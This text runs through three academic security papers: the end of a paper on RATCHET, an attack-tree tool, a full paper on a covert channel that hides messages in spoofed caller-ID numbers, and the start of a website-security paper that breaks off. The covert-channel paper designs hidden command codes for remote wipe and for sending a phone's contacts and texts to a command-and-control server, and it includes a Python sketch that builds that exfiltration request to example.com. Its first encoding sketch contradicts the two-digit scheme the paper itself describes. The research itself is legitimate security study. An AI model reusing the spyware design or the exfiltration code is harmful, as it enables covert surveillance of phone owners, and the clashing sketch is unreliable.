We hope to make many improvements to RATCHET based on the feedback we have received thus far. Some suggestions we have been considering include the ability to work offline, limiting specific trees or nodes to a subset of logged-in users, and the addition of analysis tools. It would also be good for RATCHET to allow batch uploading of entire trees. This might be done by supplying the user with a JSON (JavaScript Object Notation) format; once a correctly formatted file is uploaded, the system would parse the file and install the tree.
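One possible shape for such a batch-upload format is a nested JSON object per node, as sketched below. The field names (`name`, `children`) are hypothetical, not a format RATCHET currently defines; the sketch only illustrates that a recursive walk of the parsed tree is all the importer needs.

```python
import json

def count_nodes(tree):
    """Walk an uploaded tree and count the nodes to be installed."""
    return 1 + sum(count_nodes(c) for c in tree.get("children", []))

# A hypothetical uploaded file, matching the sketched format.
uploaded = json.loads("""
{"name": "Obtain user's password",
 "children": [{"name": "Bribe the user", "children": []},
              {"name": "Install a keylogger",
               "children": [{"name": "Burglarize the office",
                             "children": []}]}]}
""")
```

The same recursion that counts nodes here would, in an importer, create each node and attach it to its parent.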

VI. CLASSROOM FEEDBACK

During the Spring semester of 2014, Professors Stackpole and Johnson taught a class titled Penetration Testing Methodologies in which they hosted an exercise using the RATCHET system. The goal of this class is to provide students with a realistic

Fig. 6. A Simple Attack Tree in RATCHET

experience with the tools, techniques, and goals that face a typical penetration tester or ethical hacker. Students are introduced to the offensive side with items such as Open Source Intelligence (OSINT), scanning, penetration testing frameworks and collaboration tools, stepping stones, and password cracking. On the defensive side, items such as firewalls, Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), antivirus, software updates, and the like are introduced.

Attack trees were presented as a tool for organizing a penetration testing exercise. The concept of attack trees was raised as the topic for an initial discussion with students, and a short training session on how to use RATCHET was presented. Students were broken into four teams of six students each. Each team was instructed to address two goals: one goal specified the target as an operating system, and the other addressed the exploitation of an application. Each team was instructed to perform a pre-event survey capturing their preconceived notions and opinions on the use and value of attack trees. The class was given a half-hour introduction to the RATCHET system and its use. Each team was to conceptualize an attack tree to reach their stated goals and to input their attack tree elements into the RATCHET system.

Each team was tasked with reviewing the attack trees created by two other teams, adding content where appropriate, and reviewing the work submitted by their peer teams. The student teams were then tasked with using their attack trees to perform an attack on a specific target in the Security Lab. Finally, the students were asked to provide feedback on the experience of designing their own tree specific to the RATCHET implementation through another survey instrument. This exercise spanned approximately three weeks of the course.

From this exercise, several changes were made to the RATCHET system, mainly revolving around the interface design. The ability to change the focus of the tree, and the indication of which node on the screen commands or instructions apply to, were enhanced. It was noticed that students did not immediately build the attack tree in RATCHET; they built it first on a whiteboard and then transposed it to RATCHET. The feedback from students indicates that “in an unfamiliar environment, that which is familiar is attractive.”

Several issues arose from this exercise that were addressed, such as trouble with creating trees, adding new nodes, and voting. While these issues did not stop the exercise, they did limit the amount of work that the students could accomplish. As such, the exercise was helpful for the developers and enlightening for the students, but the results were of mixed value and will not be included in this paper. Professors Johnson and Stackpole plan to use this exercise in future classes.

In Fall 2014, Professor Markowsky taught a similar course in cybersecurity at the University of Maine that included attack trees as one of the topics studied. Students were encouraged to draw attack trees manually, to use Seamonster [9], and to use RATCHET. Informal feedback was solicited. As might be expected, the manual approach was the easiest approach to start with. It was clear that there were advantages to generating attack trees on the computer, since they generally looked better and were easier to share. Seamonster was easy to use, but did not support crowdsourcing. Some people thought RATCHET was more complicated to use than Seamonster, but just about


everyone agreed that RATCHET produced the best-looking trees. Many students did not like the fact that they were unable to delete nodes once they were created.

In the original design of RATCHET it was decided that users could not delete nodes and that voting would be the way nodes were promoted or demoted. We did not want a user to simply delete a tree that many other people had worked on. It was clear that in creating attack trees there would be occasional false steps that users wanted to remove from the tree, and they became frustrated by not being able to do so. We plan to explore ways to enable users to delete nodes in limited situations. This might take the form of enabling deletion only of nodes created by the user within a single editing session, or allowing users to delete nodes that they created but that have not been used by anyone else working on the attack tree.

VII. FUTURE WORK

We have discussed some of the improvements we hope to implement in RATCHET. In addition to the items already mentioned, there are some other tasks that we would like to complete. First, we would like to construct a library of commonly needed sub-trees that could be copied into a tree under construction to speed up development. Second, we would like to augment the current attribute feature to handle richer structured characteristics such as arrays, tables, or documents. Third, we would like to augment the voting feature to allow voting on the attributes individually.

In addition, we would like to add functions to RATCHET that can perform various analyses of attack trees, such as critical path or least-cost analysis. Finally, we hope to develop an application program interface (API) to support the development of external tools that utilize RATCHET.

VIII. CONCLUSIONS

Compared to other well-established fields of study such as engineering and chemistry, computing security is still in its infancy. As in the beginnings of those other fields, methods, language, and measurements had to be discovered, developed, and generally accepted. The ability to record, exchange, and compare the security state of an environment or situation is necessary in order for the field to progress beyond an art. We believe that attack trees can be used to document, describe, and measure complex, multivariable, and situationally sensitive environments such as the ones found in computing security.

We hope that the impact of attack tree software on the field of computing security will be similar to the impact of electronic spreadsheet programs such as Lotus 1-2-3 or VisiCalc [12]. Just as spreadsheets permit business people to easily explore “What if?” scenarios, attack trees can provide cybersecurity people the opportunity to experiment with “What if?” scenarios. Examples of the sorts of questions people could ask are: “What if I replaced one firewall product with another?”, “What if the Exchange mail server is replaced by the Exim mail server?”, “What if remote management is enabled in a particular networking device?”. In general, these and other scenarios could be explored quickly and cheaply.

The research and development efforts so far have demonstrated that attack trees can be constructed through the work of a community. The ability of attack trees to record and communicate the attack surface of an operating system, service, or situation has been demonstrated. It has also been demonstrated that attack trees can be shared and assembled to build large and complete attack trees. We look forward to continuing the development of RATCHET and we welcome feedback from the IT community.

REFERENCES

[1] B. Schneier, Secrets and Lies: Digital Security in a Networked World: With New Information About Post-9/11 Security. Indianapolis, Ind.: Wiley, 2004.

[2] C. Ericson, “Fault Tree Analysis – History,” Proc. 17th Int. Syst. Safety Conf., 1999.

[3] P. J. Brooke and R. F. Paige, “Fault trees for security system design and analysis,” Comput. Secur., vol. 22, no. 3, pp. 256-264, 2003.

[4] J. B. Odubiyi and C. W. O'Brien, “Information security attack tree modeling,” Pract. Exp. Approaches Inf. Secur. Educ., pp. 29-37, 2006.

[5] J. L. Bayuk, CISA, and CISM, Stepping Through the InfoSec Program, 1st edition. Rolling Meadows, IL: Isaca, 2007.

[6] T. Zhang, M. Hu, X. Yun, and Y. Zhang, “Computer vulnerability evaluation using fault tree analysis,” Information Security Practice and Experience, Springer, 2005, pp. 302-313.

[7] K. S. Edge, G. C. Dalton, R. A. Raines, and R. F. Mills, “Using attack and protection trees to analyze threats and defenses to homeland security,” Military Communications Conference, 2006. MILCOM 2006. IEEE, 2006, pp. 1-7.

[8] M. Bauer, Linux Server Security. O'Reilly Media, Inc., 2005.

[9] Seamonster – Security Modeling Software, Sourceforge Project, http://sourceforge.net/projects/seamonster/.

[10] A. Roy, D. S. Kim, and K. S. Trivedi, “Cyber security analysis using attack countermeasure trees,” Proceedings of the Sixth Annual Workshop on Cyber Security and Information Intelligence Research, 2010, article no. 28, pp. 28-1–28-4.

[11] “W3C,” SVG Working Group, n.d., web, accessed 30 Oct. 2014.

[12] P. Cunningham and F. Fröschl, Electronic Business Revolution: Opportunities and Challenges in the 21st Century. Springer Science & Business Media, 1999.


A Covert Channel in the Worldwide Public Switched Telephone Network Dial Plan

Bryan Harmat, Jared Stroud, and Daryl Johnson

Department of Computing Security, Rochester Institute of Technology

Rochester, NY 14623

Email: {bjh7242, jxs1261, daryl.johnson}@rit.edu

Abstract—The worldwide dial plan proposed by the International Telecommunication Union recommendation E.164 reserves multiple country codes for future use. These unused codes present an opportunity for a potential covert channel over the public switched telephone network that uses the spoofed source phone number of a call to send information to a mobile device. The reserved country codes can act as a delimiter indicating that a secret message is being sent. By spoofing a call using a reserved country code number, an application listening on the mobile device can intercept the call and extract information from the remaining digits based on ASCII encoding in a decimal format. The purpose of using a reserved country code number is to ensure that no service is denied to the user by a call from a legitimate phone number.

Keywords—Covert channel; Public Switched Telephone Network; Dial plan; Android; Phone number

I. INTRODUCTION

The public switched telephone network “refers to the worldwide voice telephone network accessible to all those with telephones and access privileges,” as defined by Newton [15]. A dial plan (also commonly referred to as a numbering plan) is “a numbering scheme used in telecommunications to allocate telephone number ranges to countries, regions, areas, and exchanges, and to nonfixed telephone networks such as mobile phone networks” [17]. This is essential for call routing and is the central component of how phone numbers are allocated to different regions. By taking a subset of a dial plan and converting the numeric values to ASCII characters, it is possible to embed hidden messages in a spoofed calling source number.
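The digit-to-ASCII conversion can be sketched as follows, under the assumption that the spoofed caller ID begins with a reserved country code (999 here) acting as the covert-message delimiter, and that the remaining digits carry the payload as three-digit decimal ASCII codes. The exact framing in the authors' implementation may differ.

```python
RESERVED_CC = "999"  # an E.164 country code "reserved for future use"

def encode(message):
    """Build a spoofable caller ID: delimiter + 3-digit ASCII codes."""
    return RESERVED_CC + "".join(f"{ord(ch):03d}" for ch in message)

def decode(number):
    """Extract a covert message from an incoming caller ID, or pass
    legitimate calls through untouched (return None)."""
    if not number.startswith(RESERVED_CC):
        return None  # legitimate phone number: no message, no denied service
    payload = number[len(RESERVED_CC):]
    return "".join(chr(int(payload[i:i+3])) for i in range(0, len(payload), 3))
```

For example, "Hi" becomes the caller ID 999072105 (H = 72, i = 105), and any number not starting with the reserved code is delivered to the user normally, which is the property the abstract emphasizes.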

A. Legality

In the United States, the Truth in Caller ID Act of 2009 prohibits caller ID spoofing if the caller has "the intent to defraud, cause harm, or wrongfully obtain anything of value" [2]. However, there was no malicious intent during the development of this channel, as all tests used the authors' own devices.

B. North American Numbering Plan

The ITU E.164 recommendation [10] reserves multiple country codes such as 0 and 999. There should be no valid phone call from a phone number beginning with values such as these, since they are "reserved for future use" [10]. Due to this, a covert channel can be created by taking advantage of the worldwide public switched telephone network dial plan. For simplicity, and to allow the proposed methods of extensibility to be described against a single format, this covert channel follows the standards set forth by the North American Numbering Plan Administration rather than attempting to combine multiple regional dial plans, which may differ.

All phone numbers with the assigned country code of 1 fall under the authority of the North American Numbering Plan Administration [3]. NANPA further breaks down 10-digit phone numbers into a 3-digit Numbering Plan Area (NPA), commonly referred to as the area code, followed by a 7-digit local number. The format of phone numbers that fall within the authority of NANPA is NXX-NXX-XXXX, where N is any digit 2-9 and X is any digit 0-9 [3].

C. Defining the Covert Channel

Although the field of covert channels is in an embryonic stage, there have been multiple proposed definitions for covert channels. In 1973, Butler Lampson introduced the concept of a covert channel, describing it as "[a channel] not intended for information transfer at all" [11]. Gligor reinforced this definition by describing covert channels as "[a] communication channel that allows a process to transfer information in a manner that violates the system's security policy" [8]. Covert channels have been broken down into three categories: storage, timing, and behavioral-based channels [5]. The channel proposed in this paper can be classified as a storage channel. Millen explains that "Research in covert channels split up into four disciplines: explaining them, finding them, measuring them, and mitigating them" [13]. Considering that the proposed channel has already been explained, the remaining three factors (detection, mitigation, and measurement) are discussed below.

D. Detection and Mitigation

This covert channel can be mitigated and potentially prevented at the network layer, where the backbone infrastructure of the PSTN can examine the source phone number of a call. If the number is reserved in accordance with the ITU E.164 recommendations, then the call can be blocked and dropped. However, this can reduce system performance of the PSTN below acceptable levels, since every call would be examined for potentially spoofed numbers.

Additionally, it is possible for a transcription of all calls made to or from a mobile device to be obtained from a wireless provider. Excessive calling in a short period of time could raise suspicion.

E. Measuring Throughput and Robustness

When discussing covert channels, it is important to recognize the throughput and robustness of the channel. Throughput is defined as "the amount of data the channel is able to transmit over a given period of time" [7], and robustness is defined as "the survivability of a given channel" [7].

The channel can send three ASCII characters through the first six digits of the local number. Although ASCII defines 128 values, the printable characters have decimal values between 32 and 126 [4]. This leaves 95 characters that can be sent. Since 95 values fit within two decimal digits, each character in the secret message requires only two digits; thus, three characters can be sent with each call. This is accomplished by taking the ASCII value of the character being sent, subtracting 32, sending the message, and then adding 32 back on the other end to recover the original value. For example, the decimal value for a capital A in ASCII encoding is 65, and subtracting 32 results in 33. A phone call from the source address 999-200-3333335 therefore sends "AAA", since the receiving device adds 32 to each 33, yielding 65, the original message being sent. Further functionality is discussed later in this paper.

The formula for encoding the data on the sending device is as follows:

M = p − 32

where M is the actual message (the digits) being sent and p is the ASCII value of the plaintext character. The receiving device calculates the following formula to determine the original message sent:

p = M + 32
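The two formulas above can be checked with a short sketch (the function names are ours, not taken from the paper):

```python
def encode_message(text):
    """Map each printable ASCII character (32-126) to a two-digit
    string by subtracting 32, per the formula M = p - 32."""
    return "".join(f"{ord(c) - 32:02d}" for c in text)

def decode_message(digits):
    """Recover the plaintext: split the digit string into two-digit
    pairs and add 32 back, per the formula p = M + 32."""
    pairs = [digits[i:i + 2] for i in range(0, len(digits), 2)]
    return "".join(chr(int(pair) + 32) for pair in pairs)

# The paper's example: three 'A' characters (ASCII 65) become 33 33 33,
# carried in the first six digits of the number 999-200-3333335.
assert encode_message("AAA") == "333333"
assert decode_message("333333") == "AAA"
```

Any message longer than three characters would simply be split across multiple calls, three characters (six digits) at a time.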

This covert channel is highly robust, since the PSTN is a core part of the world's critical infrastructure and is not likely to be removed or shut down.

F. Extensibility

The proposed method of extensibility uses the area code of a phone number as a pre-shared secret codebook to send a command code to the device. This code can represent a command that tells the device what information the sender is looking for. For example, code 200 may tell the device to send data via an HTTP POST request to a web server. The URL of the web server may be a pre-shared secret, or it can be conveyed in the data portion of the number. The former can potentially become a single point of failure, because if a domain name becomes blacklisted, the phone will not be able to communicate with that server. However, if the domain can be conveyed in a secret message to the phone, this allows more flexibility in maintaining a command-and-control server to relay data back to.

If a device receives a phone call from a number beginning with a reserved value, it should examine the following digits, which may contain a hidden message. This phone call should be intercepted and terminated before being passed to the application that receives calls.

II. GENERAL PROCEDURE

The proposed channel adheres to the standard created by the North American Numbering Plan Administration. This means that the country code is followed by a three-digit Numbering Plan Area (NPA), which is followed by a seven-digit local number. The following example is a general method intended to serve as an outline for potential methods of implementing a covert channel based on the public switched telephone network dial plan. An example phone number for this channel is 999-200-3333335. Upon examining a phone number, three fields initially stand out: the country code (one to three digits), the area code (three digits, according to NANPA's standard), and the local number (seven digits, according to NANPA's standard). This channel breaks up the local number into two parts: the first six digits, and the last digit.

Value     Purpose
999       Country Code
200       Area Code
333333    First six digits of local number
5         Last digit of the local number

This channel uses each of these fields for a different purpose, as follows:

• Country code - In this channel, the country code serves as the delimiter indicating whether there is a hidden message contained in the following digits. The application residing on the mobile device looks for specified reserved country codes or spare codes. For example, country codes 0 and 999 are both reserved, and codes such as 280, 424, and 890 are all "spare codes" [10].

• Area code - The intention of this field is to provide the opportunity for the user to send "command codes" to the mobile device. This provides a feature for extensibility and creates the opportunity to develop a framework for users to develop their own commands.

• First six digits of the local number - The first six digits of the local number are used for sending the actual covert message using ASCII encoding.

• Last digit of the local number - This value is used in a method similar to the More Fragments flag in the IP header.

The country code is used as a delimiter because the application looks only for phone calls from specified reserved country codes; legitimate calls are passed up to the dialer untouched, so legitimate phone service is never denied. The ITU E.164 recommendation can be examined to determine a country code to use.
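The field layout above can be sketched as follows. The function name and return shape are illustrative assumptions, and the fixed field widths follow the paper's NANPA-based example (real country codes vary from one to three digits):

```python
def parse_covert_number(number, reserved_codes=("999", "0")):
    """Split a spoofed source number into the channel's four fields:
    country code, area code (command code), six message digits, and
    the final 'more fragments' digit. Returns None when the country
    code is not a reserved value, i.e. a legitimate call that should
    be passed through to the dialer."""
    digits = number.replace("-", "")
    for code in reserved_codes:
        if digits.startswith(code):
            rest = digits[len(code):]
            return {
                "country_code": code,
                "command_code": rest[:3],      # NPA / area code
                "message_digits": rest[3:9],   # first six digits of local number
                "more_fragments": rest[9:10],  # last digit of local number
            }
    return None

# The paper's example number splits into 999 / 200 / 333333 / 5.
fields = parse_covert_number("999-200-3333335")
assert fields == {"country_code": "999", "command_code": "200",
                  "message_digits": "333333", "more_fragments": "5"}
```

A number with an ordinary country code falls through the loop and returns None, which models the "no denial of service to legitimate calls" property.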

A. Potential Command Codes

1) Remote Wipe: A remote wipe functionality could have multiple implications. There are currently some commercial solutions available to remotely wipe a device [12], but a remote wipe function in this channel could prove useful for wiping sensitive data off of a device that has been misplaced or stolen.

2) HTTP POST: The application can be configured to send a POST request to a specific server containing information such as the applications installed, a list of contacts, or the contents of text messages.
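As a rough illustration of this command, the following sketch builds (but does not send) such a POST request. The URL, payload shape, and function name are assumptions for illustration, not details taken from the original application:

```python
import json
import urllib.request

def build_exfil_request(url, contacts):
    """Sketch of the HTTP POST command code: package device data
    (here, a contact list) as a JSON POST request to a
    command-and-control server. Nothing is sent on the wire; the
    Request object is only constructed."""
    payload = json.dumps({"contacts": contacts}).encode("utf-8")
    return urllib.request.Request(
        url,
        data=payload,
        headers={"Content-Type": "application/json"},
        method="POST",
    )

req = build_exfil_request("http://example.com/collect", ["Alice", "Bob"])
assert req.get_method() == "POST"
```

In practice the destination URL could be pre-shared or, as the paper suggests, conveyed covertly in the message digits themselves.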

B. “More Fragments”

According to RFC 791 [6], the "More Fragments" (MF) flag in the Internet Protocol header is used to indicate that a "datagram is not the last fragment." Similar to the MF flag in the IP header, the last digit of the seven-digit local number serves to indicate the end of the transmission of a covert message. The digit is drawn from a predetermined set of values that lets the sender inform the receiver when the message has finished transmitting. Instead of relying on just one value to indicate whether the message is done or more is still to come, there should be multiple values in order to increase the variety of calling phone numbers. This increases the covertness of the channel, since a weaker pattern among the calling numbers decreases detectability. For example, all even numbers could indicate the end of the transmission, and all odd numbers could indicate that there are still more parts of the message that the receiver should wait for.
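The even/odd convention suggested above amounts to a one-line check (a sketch of one possible convention, not the paper's implementation):

```python
def message_complete(last_digit):
    """One possible 'more fragments' convention from the paper: any
    even last digit marks the end of the covert message, while any
    odd digit means more fragments follow. Varying the digit across
    calls reduces the pattern among the spoofed numbers."""
    return int(last_digit) % 2 == 0

assert not message_complete("5")  # 999-200-3333335: more fragments follow
assert message_complete("4")      # any even digit would end the message
```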

III. PROOF OF CONCEPT

A. Android Application

An open source Android application titled "Call Code" [14] was originally designed as a tutorial for developers to detect incoming and outgoing calls. By modifying the source code of "Call Code" [14], it was trivial to derive the last seven digits of an incoming caller's number (with the first six containing the secret message). The application is given a higher priority for changes to the phone state by declaring a higher integer value for an intent filter in the application's manifest file. An intent is "an abstract description of an operation to be performed" [1], which can include launching applications. This gives the application first access to execution upon any change to the Android phone's state, including incoming and outgoing calls. When a call is detected, the application segments the phone number into "chunks." These "chunks" contain a country code, an area code, a city code, and the six unique digits from which the ASCII message is derived. After the number is obtained, if it matches the pre-defined reserved country code value of 999, the call is dropped, never making it to the phone's dialer application. The use of the reserved country code 999 is made possible through third-party services that allow spoofing of phone calls; during testing, the Android application "Mask My Number" [18] was used. The first six of the last seven digits of the incoming number are then segmented into three two-digit values that are converted to their ASCII representation via the method described in the introduction. In the source of the application, a hash table is constructed associating numeric values with alphabetic characters. If the incoming number contains a pair of digits that does not have a corresponding value in the hash table, it is replaced with a null value. If successful, the character is then written to a file on the external storage of the Android phone.
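The application's pair-to-character lookup can be approximated as follows. The table contents and function name are illustrative, since the original app's hash table is not reproduced in the paper; here it maps only uppercase letters, so any other pair yields the null value the paper describes:

```python
# Illustrative lookup table: two-digit strings (ASCII value minus 32)
# mapped to uppercase letters, mirroring the app's hash table idea.
PAIR_TABLE = {f"{ord(c) - 32:02d}": c
              for c in "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}

def decode_last_seven(last_seven):
    """Take the last seven digits of the incoming number, drop the
    final 'more fragments' digit, split the remaining six into three
    two-digit pairs, and map each pair through the table. Pairs with
    no table entry become None (the null value in the app)."""
    message_digits = last_seven[:6]
    pairs = [message_digits[i:i + 2] for i in range(0, 6, 2)]
    return [PAIR_TABLE.get(pair) for pair in pairs]

# The paper's example number 999-200-3333335 ends in 3333335,
# whose message digits 333333 decode to "AAA".
assert decode_last_seven("3333335") == ["A", "A", "A"]
```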

B. Forensic Analysis

Given the method described, if forensic analysis of the device is performed, the text file can be discovered, even if it has been deleted [9]. Upon examining call logs, only the spoofed number is logged; there is no trace of the original caller's number. This is beneficial because the sender can remain anonymous. However, should the channel be discovered, the information being relayed can easily be recovered if someone performing the forensic analysis is able to aggregate all of the spoofed phone numbers and parse out the digits containing the message.

IV. FUTURE WORK

OpenBTS is "an open source software project dedicated to revolutionizing mobile networks by substituting legacy telco protocols, and traditionally complex, proprietary hardware systems with Internet Protocol and a flexible software architecture" [16]. Potential future work includes determining whether spoofed phone numbers are logged at the base station as the actual originating source number or as the spoofed number. As noted previously, there are pros and cons to both options. If the legitimate number is logged, there will be many short phone calls logged between the two devices, which may raise suspicion. However, if the spoofed phone number is logged, it would be possible for someone with access to the logs to reconstruct the message if that person can determine the encoding scheme being used. A spoofed phone number may also stand out more if the logs show a number with an unused country code (such as 999). By simulating a base station using the OpenBTS software, it would be possible to test this.

Another method, which could potentially send more information to a mobile device, would be to treat the listening application as a call center application. This would allow a caller to send a message by pressing buttons, similar to navigating a menu before waiting to speak with a company representative. An established connection would allow more data to be sent at a single point in time. However, a drawback is that this would most likely cause a denial of service to the phone, since it would not be able to receive phone calls while the application is listening and connected to another caller.

V. CONCLUSION

This paper examines the North American Numbering Plan Administration's dial plan format and proposes a covert channel based on the source phone number of a call. Although the NANPA standard is used in this example, the covert channel can be extended to use the dial plan formats of other regions. By waiting for a phone call from a number with a specified value in the country code as the delimiter indicating the start of a message, an application listening on the receiving device can parse the number of the incoming call and determine the corresponding ASCII characters of the expected message.

REFERENCES

[1] Intent. [Online]. Available: http://developer.android.com/reference/android/content/Intent.html

[2] Truth in Caller ID Act of 2009. [Online]. Available: http://www.gpo.gov/fdsys/pkg/BILLS-111s30enr/pdf/BILLS-111s30enr.pdf

[3] North American Numbering Plan Administration. About the North American Numbering Plan, 2014. [Online; accessed 20-October-2014].

[4] American Standards Association. American Standard Code for Information Interchange, June 1963. [Online; accessed 19-October-2014].

[5] Daryl Johnson, Bo Yuan, and Peter Lutz. Behavior-Based Covert Channel in Cyberspace, pages 311–318, June 2009.

[6] Defense Advanced Research Projects Agency, Information Processing Techniques Office, 1400 Wilson Boulevard, Arlington, VA 22209. RFC 791 - Internet Protocol - DARPA Internet Program Protocol Specification, September 1981.

[7] Erik Brown, Bo Yuan, Daryl Johnson, and Peter Lutz. Covert channels in the HTTP network protocol: Channel characterization and detecting Man-in-the-Middle attacks. In Proceedings of the 5th International Conference on Information Warfare and Security. The Air Force Institute of Technology, Academic Conferences Limited, April 2010.

[8] Virgil D. Gligor. A Guide to Understanding Covert Channel Analysis of Trusted Systems. The Center, 1994.

[9] Jaromir Horejsi. Android forensics, part 1: How we recovered (supposedly) erased data. https://blog.avast.com/2014/07/09/android-foreniscs-pt-2-how-we-recovered-erased-data/, 2014.

[10] International Telecommunication Union. List of ITU-T Recommendation E.164 Assigned Country Codes, November 2011. [Online; accessed 13-October-2014].

[11] Butler W. Lampson. A note on the confinement problem. Commun. ACM, 16(10):613–615, October 1973.

[12] McAfee. Security for Military-Grade Google Android Devices. [Online]. Available: http://www.mcafee.com/us/resources/solution-briefs/sb-security-military-grade-android.pdf

[13] Jonathan Millen. 20 Years of Covert Channel Modeling and Analysis. Computer Science Laboratory, SRI International, May 1999.

[14] Andrew Moskvichev. Detecting incoming and outgoing phone calls on Android, March 2013. [Online]. Available: http://www.codeproject.com/Articles/548416/Detecting-incoming-and-outgoing-phone-calls-on-And

[15] Harry Newton. Newton's Telecom Dictionary, page 578. Flatiron Publishing, March 1998.

[16] OpenBTS.org. A platform for innovation. [Online]. Available: http://openbts.org/

[17] Kevin Wallace. Implementing Cisco Unified Communications Voice over IP and QoS (CVoice) Foundation Learning Guide (CCNP Voice CVoice 642-437), 4th Edition, chapter 4. Cisco Press, May 2011.

[18] Zantive. Mask My Number. [Online]. Available: https://play.google.com/store/apps/details?id=app.maskmynumber.com&hl=en

International Cooperation to Enhance Website Security

Manmohan Chaturvedi
Director, Curriculum and Pedagogy
CISO Academy
Gurgaon, India
[email protected]

Srishti Gupta
MS, Software Engineering
VIT University
Chennai, India
[email protected]

Abstract—Websites are critical for any organization, whether in the public or private domain, to reach out to the consumers of e-governance or e-commerce. The privacy of consumer data and the security of online transactions have been areas of concern. Web-based attacks and web application attacks are on the rise. In this paper we analyze the international context and options to minimize cybercrime.

Keywords—Website security, Secure online transactions, Privacy & security of consumer data, International cooperation

I. INTRODUCTION

Digital infrastructure is the substrate of modern society. The networked society will achieve the potential efficiency gains only if this infrastructure is reliable and secure. As internet and web technologies have advanced from the pure information-sharing phase to interactive, transactional, and intelligent or integration phases, many states and nations, like business corporations, see opportunities in offering web-based government (e-government) services for improving government efficiency, transparency, and competitiveness in the global economy [1].

The sharp uptake of e-government services on the internet has also brought with it security threats. Certain government websites have been observed to post citizens' names, social security numbers, property tax records, or other private information on the web without requiring user login ID and password. Cyber attackers have matured from nuisance and destructive attacks towards activities motivated by financial gains.

II. WEB-BASED THREATS TO THE PRIVACY AND SECURITY OF USER DATA

A. Privacy Policy

At a time of growing global discussion about the privacy of users and the safety of their details, it is important to have a privacy policy in place, both to make citizen users confident about the safety of their personal information and to keep them informed of the conditions under which such information can be shared with the relevant authorities.

A privacy policy is a statement or a legal document (privacy law) that discloses some or all of the ways a party gathers, uses, discloses, and manages a customer or client's data. Personal information can be anything that can be used to identify an individual, including but not limited to: name, address, date of birth, marital status, contact information, ID issue and expiry date, financial records, credit information, medical history, where one travels, and intentions to acquire goods and services. In the case of a business, it is often a statement that declares a party's policy on how it collects, stores, and releases the personal information it collects. It informs the client what specific information is collected, and whether it is kept confidential, shared with partners, or sold to other firms or enterprises.

Privacy is important to the modern state because the individual's physical and moral autonomy is grounded in it; for this reason, it is worthy of constitutional protection. The exact contents of a privacy policy will depend upon the applicable law and may need to address requirements across geographical boundaries and legal jurisdictions. Most countries have their own legislation and guidelines on who is covered, what information can be collected, and what it can be used for.

In general, a privacy policy is a statement several paragraphs long explaining to site users and customers exactly how their information will be used. It also details what information is tracked and how it is tabulated. In today's world of trying to remain anonymous and expecting privacy from outsiders, the privacy policy is that much more important to many website users and online customers.

One of the main reasons a website needs a privacy policy page is to disclose the owner's intent. People have a right to know what information is being traced behind the scenes and what the owner plans to do with that private information. For example, does the site owner collect IP addresses to establish a database of user habits to sell to other organizations? Does the site owner request addresses with the express purpose of selling the list, or are the email addresses provided for a legitimate purpose, such as sending existing customers relevant information about product issues and upgrades?

Policy statement pages are particularly useful, and are actually required by law in many jurisdictions, for sites that operate catalogue and online shopping businesses. Users must be made aware that when they purchase goods and services, their purchases are conducted in a secure and safe environment. Further, they must be assured that their personal data, such as home addresses, telephone numbers, and credit card information, will not be used in any way other than to ship goods and bill for the products. Companies are not permitted to sell private information and must always disclose any mailing lists upon which customers will be placed as a result of purchasing.

Another reason for a policy statement is to notify users that some pages may take them away from the existing website. If users choose to follow links to other resources or to outside sales pages, then they must understand that the privacy policy from the original site is no longer in force, and that they should read the terms of use of the website where they landed. In addition, users should know that any banners or third party advertisements will take them away from the originating site.

Today, one of the biggest reasons for a policy statement is to acknowledge to users the fact that either the website owner or third party advertisers may drop cookies, which may track information about the users' online habits. For many online businesses, cookies serve a legitimate purpose in that they save users time from logging into sites every time they visit them, and cookies allow information about their accounts to be stored for easy access. But, some advertising companies want to know more about the users. Either way, the use of cookies must be disclosed and the reason for the cookies must be apparent.

Finally, policy statements are mandated by some companies with which the website owner does business. Because privacy is a sensitive issue for many people, often companies will not do business with those that try to hide behind the cloak of the internet. Examples are affiliate programs. The program managers want to be sure that the affiliates are doing business in an open and honest environment. They do not want their customers deceived, and they do not want their reputations degraded. In order for affiliates to participate in certain programs, they must be upfront about the third party ads and the possible existence of cookies. They must explain that the cookies may track web traffic in an attempt to offer targeted advertisements to certain individuals. As a result, the users must have the option to decline the use of cookies, and may opt out of the activity altogether.

Government websites need to follow an extremely cautious approach when it comes to collecting personal details/information about visitors to their sites. Websites should solicit only the information that is absolutely necessary. As per many government guidelines, if a Department solicits or collects personal information from visitors through its website, it MUST incorporate a prominently displayed Privacy Statement clearly stating the purpose for which the information is being collected, whether the information shall be disclosed to anyone for any purpose, and to whom. Further, the privacy statement should also clarify whether any cookies shall be transferred onto the visitor's system during the process and what the purpose of these shall be.

B. Certificate for Website Security

In this era of cyber crimes and cyber threats, it is very important to have certain procedures in place which are acknowledged by renowned certifying agencies, and websites are required to be audited by agencies empanelled by a government agency. The Indian government guidelines for Indian government websites enumerate that if a Department's website allows e-Commerce and collects high-risk personal information from its visitors, such as credit card or bank details, this MUST be done through sufficiently secure means to avoid any inconvenience. SSL (Secure Socket Layer) and digital certificates are some of the instruments which could be used to achieve this.

Web application security is of paramount concern to owners as well as consumers of a website. Many security threats are handled at the data centre and server administrator level where the application is hosted. Application developers should, however, be sensitive about security aspects, as many security threats arise from vulnerabilities in application software code. These application-driven attacks sometimes turn out to be quite fatal. Best practices to follow while developing web applications using various technologies are available on the CERT-In website as well as in the wider internet space. Some of the key features of the NIC guidelines include: a security audit from empanelled agencies for each website/application; formulation of a security policy by the Department to address various security risks/threats; etc.

III. INTERNATIONAL EFFORT TO CONTAIN CYBER CRIME

The past two decades have witnessed a number of initiatives by international bodies such as the Organization for Economic Cooperation and Development (OECD), the Council of Europe (COE), the G-8, the European Union, the United Nations [2], and Interpol, which recognized the inherent cross-border reach of cybercrime, the limitations of unilateral approaches, and the need for international harmony in legal, technical, and other areas [3].

IV. CHALLENGES OF SECURITY IN CYBERSPACE

According to [4], the security issues raised by cyberspace pose special challenges to those wishing to bring it into a classic international security framework. These special features pertain to four aspects: actors, attribution, authority, and activity.

A. Actors

A key challenge of cyberspace is that it is populated by both state and non-state actors. An additional problem is that these two categories of users are not readily identifiable. It is for the sovereign states to ensure that non-state actors within their jurisdiction respect the law, including international legal obligations that have been incorporated into national law. Cyber criminals or terrorists residing in country A and targeting victims in country B, while insulated from direct action by country B's law enforcement agencies, remain the responsibility of country A under any collaborative treaties signed between the two countries. To achieve effective implementation, very close, proactive, and flexible interaction between the law enforcement agencies of the two signatories is essential. The matrix becomes more involved as the number of member states increases, and the ecosystem should evolve to bring transparency amongst all stakeholders.

B. Attribution

